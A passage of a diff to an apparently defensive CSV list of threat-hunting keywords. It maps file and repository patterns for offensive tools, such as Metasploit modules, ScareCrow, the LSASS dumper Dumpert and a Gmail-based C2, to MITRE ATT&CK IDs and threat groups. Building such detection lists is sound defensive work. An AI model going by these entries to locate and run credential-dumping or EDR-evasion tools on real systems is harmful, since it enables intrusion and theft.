exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*oracle_default_passwords.csv*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*optiv/ScareCrow*","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*optiv/ScareCrow*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense 
Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"*oracle_default_hashes.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*oracle_default_passwords.csv*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*orbitaldump.py*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*orbitaldump/orbitaldump*","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","440","86","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*OrderFromC2 = ReadEmail()*","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","242","40","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*OS-Command-Injection-Unix-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" 
"*OS-Command-Injection-Windows-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" "*OSCP-Archives*","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn/OSCP-Archives","1","1","N/A","N/A","7","601","196","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z" -"*osmedeus cloud*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osmedeus health*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osmedeus provider*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osmedeus 
scan*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osmedeus utils*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*osx/dump_keychain*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*osx_gatekeeper_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*OtterHacker/SetProcessInjection*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","53","10","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" +"*osmedeus cloud*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus health*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus provider*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation 
Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus scan*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osmedeus utils*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*osx/dump_keychain*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*osx_gatekeeper_bypass.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*OtterHacker/SetProcessInjection*","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","1","64","12","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*ourtn-ftshell-upcommand*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. 
All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.","T1021.002 - T1573.002 - T1001.003","TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Mr-Un1k0d3r/ThunderShell","1","0","N/A","10","10","759","254","2023-03-29T21:57:08Z","2017-09-12T01:11:29Z" "*--out=nimcrypt*","offensive_tool_keyword","nimcrypt","Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project","T1027 - T1055 - T1099 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/icyguider/nimcrypt","1","0","N/A","N/A","1","83","5","2021-03-25T00:27:12Z","2021-03-24T17:51:52Z" -"*Out-CompressedDLL.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" -"*Out-DnsTxt.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Outflank-Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 
This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*Outflank-Dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*outflanknl/Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. 
an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Out-CompressedDLL.ps1*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" +"*Out-DnsTxt.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Outflank-Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*Outflank-Dumpert.*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*outflanknl/Dumpert*","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. 
This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1003 - T1055 - T1083 - T1059 - T1204","TA0003 - TA0005 - TA0002","N/A","N/A","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" "*outflanknl/EvilClippy*","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","1","N/A","10","10","1956","381","2022-05-19T23:00:22Z","2019-03-26T12:14:03Z" "*outflanknl/Net-GPPPassword*","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","10","2","156","37","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z" -"*outflanknl/Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*outflanknl/Recon-AD*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*outflanknl/SharpHide*","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","1","N/A","9","5","445","95","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z" "*outflanknl/Spray-AD*","offensive_tool_keyword","cobaltstrike","A Cobalt Strike tool to audit Active Directory user accounts for weak - well known or easy guessable passwords.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Spray-AD","1","1","N/A","10","10","408","58","2022-04-01T07:03:39Z","2020-01-09T10:10:48Z" "*outflanknl/WdToggle*","offensive_tool_keyword","cobaltstrike","s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
